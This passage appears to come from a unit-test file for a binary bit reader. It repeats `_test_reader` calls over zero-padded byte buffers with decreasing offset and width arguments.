_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 29, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 28, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 27, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 26, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 25, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 24, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 23, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 22, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 21, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 20, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 19, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 18, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 17, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_reader(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 64, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 63, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 62, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 61, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 60, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 59, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 58, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 57, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 56, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 55, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 54, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 53, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 52, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 51, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 50, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 49, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 48, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 47, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 46, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 45, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 44, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 43, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 42, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 41, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 40, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 39, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 38, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 37, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 36, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 35, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 34, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 33, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 32, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 31, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 30, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 29, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 28, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 27, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 26, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 25, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 24, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 23, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 22, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 21, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 20, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 19, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 18, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 17, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_reader(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 64, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 63, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 62, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 61, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 60, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 59, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 58, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 57, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 56, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 55, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 54, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 53, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 52, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 51, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 50, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 49, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 48, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 47, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 46, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 45, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 44, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 43, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 42, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 41, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 40, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 39, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 38, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 37, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 36, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 35, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 34, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 33, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 32, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 31, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 30, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 29, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 28, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 27, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 26, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 25, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 24, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 23, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 22, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 21, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 20, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 19, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 18, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 17, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_reader(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 64, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 63, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 62, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 61, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 60, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 59, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 58, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 57, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 56, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 55, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 54, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 53, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 52, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 51, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 50, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 49, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 48, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 47, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 46, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 45, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 44, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 43, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 42, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 41, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 40, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 39, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 38, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 37, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 36, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 35, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 34, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 33, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 32, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 31, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 30, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 29, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 28, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 27, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 26, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 25, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 24, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 23, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 22, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 21, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 20, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 19, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 18, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 17, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_reader(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
